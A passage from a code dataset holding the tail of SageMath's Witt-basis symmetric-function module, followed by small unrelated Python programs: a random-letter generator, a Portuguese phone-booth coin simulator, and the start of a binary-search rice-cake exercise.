w-basis, for m > 0\n return self._from_dict({lam: (-1 if (m + len(lam)) % 2 == 1 else 1)\n for lam in Partitions(m, max_slope=-1)})\n for i in range(l, n + 1):\n self._precompute_cache(i, self._e_to_self_cache,\n self._e_from_self_cache,\n self._e_transition_matrices,\n self._e_inverse_transition_matrices,\n wsum_e)\n\n def _precompute_p(self, n):\n \"\"\"\n Compute the transition matrices between ``self`` and the powersum\n basis in the homogeneous components of degree `n`\n (and in those of smaller degree, if not already computed).\n The result is not returned, but rather stored in the cache.\n\n This assumes that the ``coerce_p`` keyword has been set to\n ``True`` in the initialization of ``self`` (otherwise the cache\n does not exist).\n\n INPUT:\n\n - ``n`` -- nonnegative integer\n\n EXAMPLES:\n\n The examples below demonstrate how the caches of ``w`` are built\n step by step using the ``_precompute_p`` method. Thus they rely on\n an untouched Witt symmetric basis that hasn't already seen some\n of its cache filled by other computations. 
We obtain such a basis\n by choosing a ground ring unlikely to appear elsewhere::\n\n sage: Sym = SymmetricFunctions(QQ['hell', 'yeah'])\n sage: w = Sym.Witt(coerce_h=False, coerce_e=True, coerce_p=True)\n sage: l = lambda c: [ (i[0],[j for j in sorted(i[1].items())]) for i in sorted(c.items())]\n sage: l(w._p_to_self_cache)\n []\n sage: w._precompute_p(0)\n sage: l(w._p_to_self_cache)\n [([], [([], 1)])]\n sage: w._precompute_p(1)\n sage: l(w._p_to_self_cache)\n [([], [([], 1)]), ([1], [([1], 1)])]\n sage: w._precompute_p(2)\n sage: l(w._p_to_self_cache)\n [([], [([], 1)]), ([1], [([1], 1)]), ([1, 1], [([1, 1], 1)]), ([2], [([1, 1], 1), ([2], 2)])]\n sage: w._p_transition_matrices[2]\n [2 1]\n [0 1]\n sage: w._p_inverse_transition_matrices[2]\n [ 1/2 -1/2]\n [ 0 1]\n \"\"\"\n l = len(self._p_transition_matrices)\n if l <= n:\n from sage.arith.all import divisors\n from sage.combinat.partition import Partition\n from sage.misc.cachefunc import cached_function\n\n @cached_function\n def wsum_p(m): # expansion of p_m in w-basis, for m > 0\n return self._from_dict({Partition([d] * (m // d)): d\n for d in divisors(m)})\n for i in range(l, n + 1):\n self._precompute_cache(i, self._p_to_self_cache,\n self._p_from_self_cache,\n self._p_transition_matrices,\n self._p_inverse_transition_matrices,\n wsum_p)\n\n def _h_to_w_on_basis(self, lam):\n r\"\"\"\n Return the complete homogeneous symmetric function ``h[lam]``\n expanded in the Witt basis, where ``lam`` is a partition.\n\n This assumes that the ``coerce_h`` keyword has been set to ``True`` in\n the initialization of ``self`` (otherwise the cache does not exist).\n\n INPUT:\n\n - ``lam`` -- a partition\n\n OUTPUT:\n\n - the expansion of ``h[lam]`` in the Witt basis ``self``\n\n EXAMPLES::\n\n sage: Sym = SymmetricFunctions(QQ)\n sage: h = Sym.homogeneous()\n sage: w = Sym.w()\n sage: w._h_to_w_on_basis(Partition([]))\n w[]\n sage: w._h_to_w_on_basis(Partition([4,2,1]))\n w[1, 1, 1, 1, 1, 1, 1] + 2*w[2, 1, 1, 1, 1, 1] + 2*w[2, 2, 1, 1, 1] + w[2, 2, 2, 1] + w[3, 1, 1, 1, 1] + w[3, 2, 1, 1] + w[4, 1, 1, 1] + w[4, 2, 1]\n sage: h(w._h_to_w_on_basis(Partition([3,1]))) == h[3,1]\n True\n \"\"\"\n n = sum(lam)\n self._precompute_h(n)\n return self._from_dict(self._h_to_self_cache[lam])\n\n def _w_to_h_on_basis(self, lam):\n r\"\"\"\n Return the Witt symmetric function ``w[lam]`` expanded in the\n complete homogeneous basis, where ``lam`` is a partition.\n\n This assumes that the ``coerce_h`` keyword has been set to ``True`` in\n the initialization of ``self`` (otherwise the cache does not exist).\n\n INPUT:\n\n - ``lam`` -- a partition\n\n OUTPUT:\n\n - the expansion of ``w[lam]`` in the complete\n homogeneous basis of ``self.realization_of()``\n\n EXAMPLES::\n\n sage: Sym = SymmetricFunctions(QQ)\n sage: h = Sym.homogeneous()\n sage: w = Sym.w()\n sage: w._w_to_h_on_basis(Partition([]))\n h[]\n sage: w._w_to_h_on_basis(Partition([4,2,1]))\n h[1, 1, 1, 1, 1, 1, 1] - 3*h[2, 1, 1, 1, 1, 1] + 3*h[2, 2, 1, 1, 1] - h[2, 2, 2, 1] + h[3, 1, 1, 1, 1] - h[3, 2, 1, 1] - h[4, 1, 1, 1] + h[4, 2, 1]\n sage: w(w._w_to_h_on_basis(Partition([3,1]))) == w[3,1]\n True\n \"\"\"\n n = sum(lam)\n self._precompute_h(n)\n return self._h._from_dict(self._h_from_self_cache[lam])\n\n def _e_to_w_on_basis(self, lam):\n r\"\"\"\n Return the elementary symmetric function ``e[lam]`` expanded in\n the Witt basis, where ``lam`` is a partition.\n\n This assumes that the ``coerce_e`` keyword has been set to ``True`` in\n the initialization of ``self`` (otherwise the cache does not 
exist).\n\n INPUT:\n\n - ``lam`` -- a partition\n\n OUTPUT:\n\n - the expansion of ``e[lam]`` in the Witt basis ``self``\n\n EXAMPLES::\n\n sage: Sym = SymmetricFunctions(QQ)\n sage: e = Sym.elementary()\n sage: w = Sym.w(coerce_e=True)\n sage: w._e_to_w_on_basis(Partition([]))\n w[]\n sage: w._e_to_w_on_basis(Partition([4,2,1]))\n -w[3, 2, 1, 1] + w[4, 2, 1]\n sage: e(w._e_to_w_on_basis(Partition([3,1]))) == e[3,1]\n True\n \"\"\"\n n = sum(lam)\n self._precompute_e(n)\n return self._from_dict(self._e_to_self_cache[lam])\n\n def _w_to_e_on_basis(self, lam):\n r\"\"\"\n Return the Witt symmetric function ``w[lam]``\n expanded in the elementary symmetric basis, where\n ``lam`` is a partition.\n\n This assumes that the ``coerce_e`` keyword has been set to ``True`` in\n the initialization of ``self`` (otherwise the cache does not exist).\n\n INPUT:\n\n - ``lam`` -- a partition\n\n OUTPUT:\n\n - the expansion of ``w[lam]`` in the elementary\n symmetric basis of ``self.realization_of()``\n\n EXAMPLES::\n\n sage: Sym = SymmetricFunctions(QQ)\n sage: e = Sym.elementary()\n sage: w = Sym.w(coerce_e=True)\n sage: w._w_to_e_on_basis(Partition([]))\n e[]\n sage: w._w_to_e_on_basis(Partition([4,2,1]))\n e[2, 2, 1, 1, 1] - e[3, 2, 1, 1] + e[4, 2, 1]\n sage: w(w._w_to_e_on_basis(Partition([3,1]))) == w[3,1]\n True\n \"\"\"\n n = sum(lam)\n self._precompute_e(n)\n return self._e._from_dict(self._e_from_self_cache[lam])\n\n def _p_to_w_on_basis(self, lam):\n r\"\"\"\n Return the powersum symmetric function ``p[lam]`` expanded in\n the Witt basis, where ``lam`` is a partition.\n\n This assumes that the ``coerce_p`` keyword has been set to ``True`` in\n the initialization of ``self`` (otherwise the cache does not exist).\n\n INPUT:\n\n - ``lam`` -- a partition\n\n OUTPUT:\n\n - the expansion of ``p[lam]`` in the Witt basis ``self``\n\n EXAMPLES::\n\n sage: Sym = SymmetricFunctions(QQ)\n sage: p = Sym.power()\n sage: w = Sym.w(coerce_p=True)\n sage: w._p_to_w_on_basis(Partition([]))\n w[]\n sage: w._p_to_w_on_basis(Partition([4,2,1]))\n w[1, 1, 1, 1, 1, 1, 1] + 2*w[2, 1, 1, 1, 1, 1] + 2*w[2, 2, 1, 1, 1] + 4*w[2, 2, 2, 1] + 4*w[4, 1, 1, 1] + 8*w[4, 2, 1]\n sage: p(w._p_to_w_on_basis(Partition([3,1]))) == p[3,1]\n True\n \"\"\"\n n = sum(lam)\n self._precompute_p(n)\n return self._from_dict(self._p_to_self_cache[lam])\n\n def _w_to_p_on_basis(self, lam):\n r\"\"\"\n Return the Witt symmetric function ``w[lam]`` expanded in the\n powersum basis, where ``lam`` is a partition.\n\n This assumes that the ``coerce_p`` keyword has been set to ``True`` in\n the initialization of ``self`` (otherwise the cache does not exist).\n\n INPUT:\n\n - ``lam`` -- a partition\n\n OUTPUT:\n\n - the expansion of ``w[lam]`` in the powersum\n basis of ``self.realization_of()``\n\n EXAMPLES::\n\n sage: Sym = SymmetricFunctions(QQ)\n sage: p = Sym.power()\n sage: w = Sym.w(coerce_p=True)\n sage: w._w_to_p_on_basis(Partition([]))\n p[]\n sage: w._w_to_p_on_basis(Partition([4,2,1]))\n 3/16*p[1, 1, 1, 1, 1, 1, 1] - 5/16*p[2, 1, 1, 1, 1, 1] + 3/16*p[2, 2, 1, 1, 1] - 1/16*p[2, 2, 2, 1] - 1/8*p[4, 1, 1, 1] + 1/8*p[4, 2, 1]\n sage: w(w._w_to_p_on_basis(Partition([3,1]))) == w[3,1]\n True\n \"\"\"\n n = sum(lam)\n self._precompute_p(n)\n return self._p._from_dict(self._p_from_self_cache[lam])\n\n def __init_extra__(self):\n \"\"\"\n Sets up caches for the transition maps to other bases, and registers\n them as coercions.\n\n EXAMPLES::\n\n sage: Sym = SymmetricFunctions(QQ) # indirect doctest\n sage: h = Sym.h(); w = Sym.w()\n\n sage: phi = 
h.coerce_map_from(w); phi\n Generic morphism:\n From: Symmetric Functions over Rational Field in the Witt basis\n To: Symmetric Functions over Rational Field in the homogeneous basis\n sage: phi(w.an_element()) == h(w.an_element())\n True\n sage: e = Sym.e(); w2 = Sym.w(coerce_e=True)\n sage: psi = e.coerce_map_from(w2); psi\n Generic morphism:\n From: Symmetric Functions over Rational Field in the Witt basis\n To: Symmetric Functions over Rational Field in the elementary basis\n sage: psi(w2.an_element()) == e(w2.an_element())\n True\n \"\"\"\n\n #category = sage.categories.all.ModulesWithBasis(self.base_ring())\n\n # Set up coercions and conversions with appropriate other bases.\n # self._p, self._e and self._h will be the powersum basis, the elementary\n # symmetric basis and the complete homogeneous basis (over the same base\n # ring as self), respectively (but they are only set if the respective\n # arguments ``coerce_p``, ``coerce_e`` and ``coerce_h`` are True).\n # self._friendly will be the one available basis which makes computations\n # the easiest.\n\n self._friendly = None\n\n if self._coerce_p:\n self._p = self.realization_of().p()\n # Set up the cache for conversion from the Witt basis\n # to the powersum basis.\n\n # cache for the coordinates of the elements\n # of the powersum basis with respect to the Witt basis\n self._p_to_self_cache = {}\n # cache for the coordinates of the elements\n # of the Witt basis with respect to the powersum basis\n self._p_from_self_cache = {}\n # cache for transition matrices which contain the coordinates of\n # the elements of the powersum basis with respect to the Witt basis\n self._p_transition_matrices = {}\n # cache for transition matrices which contain the coordinates of\n # the elements of the Witt basis with respect to the powersum basis\n self._p_inverse_transition_matrices = {}\n\n self.register_coercion(self._p._module_morphism(self._p_to_w_on_basis, codomain=self))\n from sage.rings.rational_field import RationalField\n if self.base_ring().has_coerce_map_from(RationalField):\n self._p.register_coercion(self._module_morphism(self._w_to_p_on_basis, codomain=self._p))\n self._friendly = self._p\n else:\n # self._w_to_p_on_basis is a partial map at best\n self._p.register_conversion(self._module_morphism(self._w_to_p_on_basis, codomain=self._p))\n if (not self._coerce_e) and (not self._coerce_h):\n # ensure that self has coercion at least to one other basis,\n # or else coercion-based computations will fail\n self._coerce_h = True\n elif (not self._coerce_e) and (not self._coerce_h):\n self._coerce_h = True # at least one coercion is needed!\n\n if self._coerce_h:\n self._h = self.realization_of().h()\n # Set up the cache for conversion from the Witt basis to the complete\n # homogeneous basis. 
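# (Recall the identity from the class docstring: h_n = \sum_{lambda \vdash n} w_lambda;\n # e.g. h_3 = w[3] + w[2, 1] + w[1, 1, 1], which is exactly the sum that the\n # cached helper wsum(m) in _precompute_h builds, degree by degree.)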
(This is the conversion that is used by default.)\n\n # cache for the coordinates of the elements\n # of the homogeneous basis with respect to the Witt basis\n self._h_to_self_cache = {}\n # cache for the coordinates of the elements\n # of the Witt basis with respect to the homogeneous basis\n self._h_from_self_cache = {}\n # cache for transition matrices which contain the coordinates of\n # the elements of the homogeneous basis with respect to the Witt basis\n self._h_transition_matrices = {}\n # cache for transition matrices which contain the coordinates of\n # the elements of the Witt basis with respect to the homogeneous basis\n self._h_inverse_transition_matrices = {}\n self.register_coercion(self._h._module_morphism(self._h_to_w_on_basis, codomain=self))\n self._h.register_coercion(self._module_morphism(self._w_to_h_on_basis, codomain=self._h))\n if self._friendly is None:\n self._friendly = self._h\n\n if self._coerce_e:\n self._e = self.realization_of().e()\n # Set up the cache for conversion from the Witt basis to the elementary\n # symmetric basis.\n\n # cache for the coordinates of the elements\n # of the elementary basis with respect to the Witt basis\n self._e_to_self_cache = {}\n # cache for the coordinates of the elements\n # of the Witt basis with respect to the elementary basis\n self._e_from_self_cache = {}\n # cache for transition matrices which contain the coordinates of\n # the elements of the elementary basis with respect to the Witt basis\n self._e_transition_matrices = {}\n # cache for transition matrices which contain the coordinates of\n # the elements of the Witt basis with respect to the elementary basis\n self._e_inverse_transition_matrices = {}\n self.register_coercion(self._e._module_morphism(self._e_to_w_on_basis, codomain=self))\n self._e.register_coercion(self._module_morphism(self._w_to_e_on_basis, codomain=self._e))\n if self._friendly is None:\n self._friendly = self._e\n\n def from_other_uncached(self, u):\n r\"\"\"\n Return an element ``u`` of another basis of the ring of\n symmetric functions, expanded in the Witt basis ``self``.\n The result is the same as ``self(u)``, but the\n ``from_other_uncached`` method does not precompute a\n cache with transition matrices. 
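(For instance, by the identity `p_n = \sum_{d \mid n} d w_d^{n/d}` stated\n in the class docstring, `p_6` expands directly as\n `w_1^6 + 2 w_2^3 + 3 w_3^2 + 6 w_6`; no transition matrix is needed.)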
Thus,\n ``from_other_uncached`` is faster when ``u`` is sparse.\n\n INPUT:\n\n - ``u`` -- an element of ``self.realization_of()``\n\n OUTPUT:\n\n - the expansion of ``u`` in the Witt basis ``self``\n\n EXAMPLES::\n\n sage: Sym = SymmetricFunctions(QQ)\n sage: p = Sym.p()\n sage: w = Sym.w()\n sage: a = p([3,2]) - p([4,1]) + 27 * p([3])\n sage: w.from_other_uncached(a) == w(a)\n True\n\n Here's a verification of an obvious fact that would take\n long with regular coercion::\n\n sage: fouc = w.from_other_uncached\n sage: fouc(p([15]))\n w[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1] + 3*w[3, 3, 3, 3, 3] + 5*w[5, 5, 5] + 15*w[15]\n sage: fouc(p([15])) * fouc(p([14])) == fouc(p([15, 14]))\n True\n\n Other bases::\n\n sage: e = Sym.e()\n sage: h = Sym.h()\n sage: s = Sym.s()\n sage: all( fouc(e(lam)) == w(e(lam)) for lam in Partitions(5) )\n True\n sage: all( fouc(h(lam)) == w(h(lam)) for lam in Partitions(5) )\n True\n sage: all( fouc(p(lam)) == w(p(lam)) for lam in Partitions(5) )\n True\n sage: all( fouc(s(lam)) == w(s(lam)) for lam in Partitions(5) )\n True\n \"\"\"\n parent_name = u.parent().basis_name()\n from sage.misc.cachefunc import cached_function\n\n if parent_name == \"homogeneous\":\n from sage.combinat.partition import Partitions_n\n\n @cached_function\n def wsum(m): # expansion of h_m in w-basis, for m > 0\n return self._from_dict({lam: 1 for lam in Partitions_n(m)})\n result = self.zero()\n for lam, a in u.monomial_coefficients().items():\n product = self.one()\n for i in lam:\n product *= wsum(i)\n result += a * product\n return result\n\n if parent_name == \"powersum\":\n from sage.arith.all import divisors\n from sage.combinat.partition import Partition\n\n @cached_function\n def wsum_p(m): # expansion of p_m in w-basis, for m > 0\n return self._from_dict({Partition([d] * (m // d)): d\n for d in divisors(m)})\n result = self.zero()\n for lam, a in u.monomial_coefficients().items():\n product = self.one()\n for i in lam:\n product *= wsum_p(i)\n result += a * product\n return result\n\n # Coerce u into elementary symmetric basis.\n if parent_name != \"elementary\":\n u = u.parent().realization_of().elementary()(u)\n\n from sage.combinat.partition import Partitions\n\n @cached_function\n def wsum_e(m): # expansion of e_m in w-basis, for m > 0\n return self._from_dict({lam: (-1 if (m + len(lam)) % 2 else 1)\n for lam in Partitions(m, max_slope=-1)})\n result = self.zero()\n for lam, a in u.monomial_coefficients().items():\n product = self.one()\n for i in lam:\n product *= wsum_e(i)\n result += a * product\n return result\n\n def coproduct(self, elt):\n r\"\"\"\n Return the coproduct of the element ``elt``.\n\n INPUT:\n\n - ``elt`` -- a symmetric function written in this basis\n\n OUTPUT:\n\n - The coproduct acting on ``elt``; the result is an element of the\n tensor squared of the basis ``self``\n\n EXAMPLES::\n\n sage: w = SymmetricFunctions(QQ).w()\n sage: w[2].coproduct()\n w[] # w[2] - w[1] # w[1] + w[2] # w[]\n sage: w.coproduct(w[2])\n w[] # w[2] - w[1] # w[1] + w[2] # w[]\n sage: w[2,1].coproduct()\n w[] # w[2, 1] - w[1] # w[1, 1] + w[1] # w[2] - w[1, 1] # w[1] + w[2] # w[1] + w[2, 1] # w[]\n sage: w.coproduct(w[2,1])\n w[] # w[2, 1] - w[1] # w[1, 1] + w[1] # w[2] - w[1, 1] # w[1] + w[2] # w[1] + w[2, 1] # w[]\n\n TESTS:\n\n The same, but with other settings::\n\n sage: w = SymmetricFunctions(QQ).w(coerce_h=False, coerce_e=True)\n sage: w[2].coproduct()\n w[] # w[2] - w[1] # w[1] + w[2] # w[]\n sage: w.coproduct(w[2])\n w[] # w[2] - w[1] # w[1] + w[2] # w[]\n sage: 
w[2,1].coproduct()\n w[] # w[2, 1] - w[1] # w[1, 1] + w[1] # w[2] - w[1, 1] # w[1] + w[2] # w[1] + w[2, 1] # w[]\n sage: w.coproduct(w[2,1])\n w[] # w[2, 1] - w[1] # w[1, 1] + w[1] # w[2] - w[1, 1] # w[1] + w[2] # w[1] + w[2, 1] # w[]\n\n sage: w = SymmetricFunctions(QQ).w(coerce_h=False, coerce_p=True)\n sage: w[2].coproduct()\n w[] # w[2] - w[1] # w[1] + w[2] # w[]\n sage: w.coproduct(w[2])\n w[] # w[2] - w[1] # w[1] + w[2] # w[]\n sage: w[2,1].coproduct()\n w[] # w[2, 1] - w[1] # w[1, 1] + w[1] # w[2] - w[1, 1] # w[1] + w[2] # w[1] + w[2, 1] # w[]\n sage: w.coproduct(w[2,1])\n w[] # w[2, 1] - w[1] # w[1, 1] + w[1] # w[2] - w[1, 1] # w[1] + w[2] # w[1] + w[2, 1] # w[]\n """\n from sage.categories.tensor import tensor\n friendly = self._friendly\n return self.tensor_square().sum(coeff * tensor([self(friendly[x]), self(friendly[y])])\n for ((x,y), coeff) in friendly(elt).coproduct())\n\n def verschiebung(self, n):\n r"""\n Return the image of the symmetric function ``self`` under the\n `n`-th Verschiebung operator.\n\n The `n`-th Verschiebung operator `\mathbf{V}_n` is defined to be\n the unique algebra endomorphism `V` of the ring of symmetric\n functions that satisfies `V(h_r) = h_{r/n}` for every positive\n integer `r` divisible by `n`, and satisfies `V(h_r) = 0` for\n every positive integer `r` not divisible by `n`. This operator\n `\mathbf{V}_n` is a Hopf algebra endomorphism. For every\n nonnegative integer `r` with `n \mid r`, it satisfies\n\n .. MATH::\n\n \mathbf{V}_n(h_r) = h_{r/n},\n \quad \mathbf{V}_n(p_r) = n p_{r/n},\n \quad \mathbf{V}_n(e_r) = (-1)^{r - r/n} e_{r/n},\n \quad \mathbf{V}_n(w_r) = w_{r/n},\n\n (where `h` is the complete homogeneous basis, `p` is the\n powersum basis, `e` is the elementary basis, and `w` is the\n Witt basis). For every nonnegative integer `r` with `n \nmid r`,\n it satisfies\n\n .. MATH::\n\n \mathbf{V}_n(h_r) = \mathbf{V}_n(p_r) = \mathbf{V}_n(e_r)\n = \mathbf{V}_n(w_r) = 0.\n\n The `n`-th Verschiebung operator is also called the `n`-th\n Verschiebung endomorphism. Its name derives from the Verschiebung\n (German for "shift") endomorphism of the Witt vectors.\n\n The `n`-th Verschiebung operator is adjoint to the `n`-th\n Frobenius operator (see :meth:`frobenius` for its definition)\n with respect to the Hall scalar product (:meth:`scalar`).\n\n The action of the `n`-th Verschiebung operator on the Schur basis\n can also be computed explicitly. The following (probably clumsier\n than necessary) description can be obtained by solving exercise\n 7.61 in Stanley's [STA]_.\n\n Let `\lambda` be a partition. Let `n` be a positive integer. If\n the `n`-core of `\lambda` is nonempty, then\n `\mathbf{V}_n(s_\lambda) = 0`. Otherwise, the following method\n computes `\mathbf{V}_n(s_\lambda)`: Write the partition `\lambda`\n in the form `(\lambda_1, \lambda_2, \ldots, \lambda_{ns})` for some\n nonnegative integer `s`. (If `n` does not divide the length of\n `\lambda`, then this is achieved by adding trailing zeroes to\n `\lambda`.) Set `\beta_i = \lambda_i + ns - i` for every\n `i \in \{ 1, 2, \ldots, ns \}`. Then,\n `(\beta_1, \beta_2, \ldots, \beta_{ns})` is a strictly decreasing\n sequence of nonnegative integers. Stably sort the list\n `(1, 2, \ldots, ns)` in order of (weakly) increasing remainder of\n `-1 - \beta_i` modulo `n`. Let `\xi` be the sign of the\n permutation that is used for this sorting. 
Let `\\psi` be the sign\n of the permutation that is used to stably sort the list\n `(1, 2, \\ldots, ns)` in order of (weakly) increasing remainder of\n `i - 1` modulo `n`. (Notice that `\\psi = (-1)^{n(n-1)s(s-1)/4}`.)\n Then, `\\mathbf{V}_n(s_\\lambda) = \\xi \\psi \\prod_{i = 0}^{n - 1}\n s_{\\lambda^{(i)}}`, where\n `(\\lambda^{(0)}, \\lambda^{(1)}, \\ldots, \\lambda^{(n - 1)})`\n is the `n`-quotient of `\\lambda`.\n\n INPUT:\n\n - ``n`` -- a positive integer\n\n OUTPUT:\n\n The result of applying the `n`-th Verschiebung operator (on the ring of\n symmetric functions) to ``self``.\n\n EXAMPLES::\n\n sage: Sym = SymmetricFunctions(ZZ)\n sage: w = Sym.w()\n sage: w[3].verschiebung(2)\n 0\n sage: w[4].verschiebung(4)\n w[1]\n\n TESTS:\n\n Let us check that this method on the Witt basis gives the\n same result as the implementation in sfa.py on the complete\n homogeneous basis::\n\n sage: Sym = SymmetricFunctions(QQ)\n sage: w = Sym.w(); h = Sym.h()\n sage: all( w(h(lam)).verschiebung(3) == w(h(lam).verschiebung(3))\n ....: for lam in Partitions(6) )\n True\n sage: all( h(w(lam)).verschiebung(2) == h(w(lam).verschiebung(2))\n ....: for lam in Partitions(4) )\n True\n \"\"\"\n parent = self.parent()\n w_coords_of_self = self.monomial_coefficients().items()\n from sage.combinat.partition import Partition\n dct = {Partition([i // n for i in lam]): coeff\n for lam, coeff in w_coords_of_self\n if all(i % n == 0 for i in lam)}\n result_in_w_basis = parent._from_dict(dct)\n return result_in_w_basis\n","repo_name":"sagemath/sage-archive-2023-02-01","sub_path":"src/sage/combinat/sf/witt.py","file_name":"witt.py","file_ext":"py","file_size_in_byte":50874,"program_lang":"python","lang":"en","doc_type":"code","stars":2037,"dataset":"github-code","pt":"40"} +{"seq_id":"71984590200","text":"import random as rd\nclass Escribe:\n\n def __init__(self, abecedario=[]):\n if len(abecedario)==0:\n self.abecedario=\\\n [\"a\",\"b\",\"c\",\"d\",\"e\",\"f\",\"g\",\"h\",\"i\",\"j\",\"k\",\n \"l\",\"m\",\"n\",\"o\",\"p\",\"q\",\"r\",\"s\",\"t\",\"u\",\"v\",\"w\",\"x\",\"y\",\"z\"]\n\n\n def escribir(self,numeroDePalabras=10):\n str=\"\"\n for i in range(0,numeroDePalabras):\n str=str+self.abecedario[rd.randint(0, 25)]\n return str\n\n def divide_str(self,string):\n lista=[]\n for i in range(0,len(string)):\n lista.append(string[i])\n\n return lista\n\n","repo_name":"Rin94/GitChanges","sub_path":"escribe_palabras.py","file_name":"escribe_palabras.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"15849704195","text":"import re\nimport sys\n\n#0 => pousada\n#1 => LEVANTADA\n#2 => IN CALL\n#500 => ERRO\n\nclass Telefone:\n status = 0\n moedasExistentes = [1, 2, 5, 10, 20, 50, 100, 200]\n dinheiroAtual = 0\n\n def handle_moedas(self, moedas):\n m = re.compile(\"\\d*[ce]\")\n naoExistentes = []\n for moeda in m.findall(moedas):\n moedaOriginal = moeda\n print(moeda + \" <=> \" + moedaOriginal)\n if 'e' in moeda:\n moeda = int(moeda.replace(\"e\", \"\")) * 100\n moeda = int(moeda.replace(\"c\", \"\"))\n if moeda in self.moedasExistentes:\n self.dinheiroAtual += moeda\n else:\n naoExistentes.append(moedaOriginal)\n\n if len(naoExistentes) > 0:\n return f'{\",\".join(naoExistentes)} - moeda inválida; saldo = {self.getSaldo()}'\n else:\n return f'saldo = {self.getSaldo()}'\n\n def getSaldo(self):\n euros = int(self.dinheiroAtual/100)\n cents = self.dinheiroAtual%100\n return f'{euros:0d}e{cents:02d}c'\n\n def 
{"seq_id":"15849704195","text":"import re\nimport sys\n\n#0 => pousada\n#1 => LEVANTADA\n#2 => IN CALL\n#500 => ERRO\n\nclass Telefone:\n    status = 0\n    moedasExistentes = [1, 2, 5, 10, 20, 50, 100, 200]\n    dinheiroAtual = 0\n\n    def handle_moedas(self, moedas):\n        m = re.compile(\"\\d*[ce]\")\n        naoExistentes = []\n        for moeda in m.findall(moedas):\n            moedaOriginal = moeda\n            if 'e' in moeda:\n                moeda = int(moeda.replace(\"e\", \"\")) * 100\n            else:\n                # without this else, euro coins crashed on int.replace below\n                moeda = int(moeda.replace(\"c\", \"\"))\n            if moeda in self.moedasExistentes:\n                self.dinheiroAtual += moeda\n            else:\n                naoExistentes.append(moedaOriginal)\n\n        if len(naoExistentes) > 0:\n            return f'{\",\".join(naoExistentes)} - moeda inválida; saldo = {self.getSaldo()}'\n        else:\n            return f'saldo = {self.getSaldo()}'\n\n    def getSaldo(self):\n        euros = int(self.dinheiroAtual/100)\n        cents = self.dinheiroAtual%100\n        return f'{euros:0d}e{cents:02d}c'\n\n    def getTroco(self):\n        restante = self.dinheiroAtual\n        moedas = {'2e': 0, '1e': 0, '50c': 0, '20c': 0, '10c': 0, '5c': 0, '2c': 0, '1c': 0}\n        while restante > 0:\n            if restante >= 200:\n                moedas['2e'] += 1\n                restante -= 200\n            if restante >= 100:\n                moedas['1e'] += 1\n                restante -= 100\n            if restante >= 50:\n                moedas['50c'] += 1\n                restante -= 50\n            if restante >= 20:\n                moedas['20c'] += 1\n                restante -= 20\n            if restante >= 10:\n                moedas['10c'] += 1\n                restante -= 10\n            if restante >= 5:\n                moedas['5c'] += 1\n                restante -= 5\n            if restante >= 2:\n                moedas['2c'] += 1\n                restante -= 2\n            if restante >= 1:\n                moedas['1c'] += 1\n                restante -= 1\n        return ','.join([str(value) + \"x\" + str(key) for key,value in moedas.items() if value > 0])\n\n    def gastaDinheiro(self, valor):\n        # >= permite gastar exatamente o saldo disponível\n        if self.dinheiroAtual - valor >= 0:\n            self.dinheiroAtual -= valor\n            return True\n        return False\n\n    def handle_chamada(self, chamada):\n        numero = chamada.replace(\"T=\", \"\")\n\n        handle_loc = re.search(\"\\d*\", numero)\n        handle_int = re.search(\"00\\d*\", numero)\n        if handle_int:\n            if self.gastaDinheiro(150):\n                self.status = 2\n                return \"saldo = \" + self.getSaldo()\n            else:\n                return \"Não dispõe de dinheiro para efetuar a chamada.\"\n        if handle_loc and len(handle_loc.group(0)) == 9:\n            handle_loc = handle_loc.group(0)\n            if handle_loc[:3] == \"601\" or handle_loc[:3] == \"641\":\n                return \"Esse número não é permitido neste telefone. Queira discar novo número!\"\n            if handle_loc[:3] == \"808\" and not self.gastaDinheiro(10):\n                return \"Não dispõe de dinheiro para efetuar a chamada.\"\n            if handle_loc[:1] == \"2\" and not self.gastaDinheiro(25):\n                return \"Não dispõe de dinheiro para efetuar a chamada.\"\n            self.status = 2\n            return \"saldo = \" + self.getSaldo()\n        return \"Esse número não é permitido neste telefone. Queira discar novo número!\"\n\n    def handle_levantar(self):\n        if self.status != 1:\n            self.status = 1\n            return \"Introduza moedas.\"\n\n    def handle_pousar(self):\n        self.status = 0\n        return f'troco={self.getTroco()}; Volte sempre!'\n\n    def handle_input(self, input):\n        output = \"ERRO\"\n        if re.match(\"T=\\d+\", input):\n            output = self.handle_chamada(input)\n        if re.match(\"MOEDA \\d*[ce]\", input):\n            output = self.handle_moedas(input)\n        if input == \"DINHEIRO\":\n            print(self.dinheiroAtual)\n        if input == \"LEVANTAR\":\n            output = self.handle_levantar()\n        if input == \"POUSAR\":\n            output = self.handle_pousar()\n        if input == \"ABORTAR\":\n            print(\"ABORTAR\")\n        return f'maq: \"{output}\"'\n\ndef main():\n    print('maq: \"Bem-vindo à cabine telefónica!\"')\n    t = Telefone()\n    while True:\n        line = input().strip()\n        if not line:\n            continue\n        output = t.handle_input(line)\n        print(output)\n        if output == -1:\n            print('maq: \"Até a próxima ligação!\"')\n            break\n\nif __name__ == \"__main__\":\n    main()","repo_name":"LuisFilipe6/PL2023","sub_path":"TPC5/tpc5.py","file_name":"tpc5.py","file_ext":"py","file_size_in_byte":4623,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"74512281721","text":"import sys\nN, M = map(int, input().split())\nricecake = list(map(int, input().split()))\nricecake.sort()\nl, r = 0, ricecake[-1]\nmax_h = 0\nwhile l <= r:\n    mid = (l+r)//2\n    cnt = 0\n    for cake in ricecake:  # renamed: the loop variable used to shadow the right bound `r`\n        if cake > mid: cnt += cake-mid\n    if cnt == M:\n        max_h = mid\n        break\n    elif cnt < M:\n        r = mid-1\n    else:\n        max_h = mid  # remember this height: the answer cuts off as little as possible\n        l = mid+1\nprint(max_h)","repo_name":"gyoforit/study-algorithm","sub_path":"etc/binarysearch_떡볶이떡만들기.py","file_name":"binarysearch_떡볶이떡만들기.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
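The rice-cake record above is an instance of parametric search ("binary search on the answer"): the amount cut off is monotone non-increasing in the blade height, so the largest feasible height is found in O(n log max_height). A generic sketch of the pattern (the record stops early on an exact match; the standard formulation only needs "at least M"):

    def max_blade_height(cakes, need):
        lo, hi, best = 0, max(cakes), 0
        while lo <= hi:
            mid = (lo + hi) // 2
            cut = sum(c - mid for c in cakes if c > mid)
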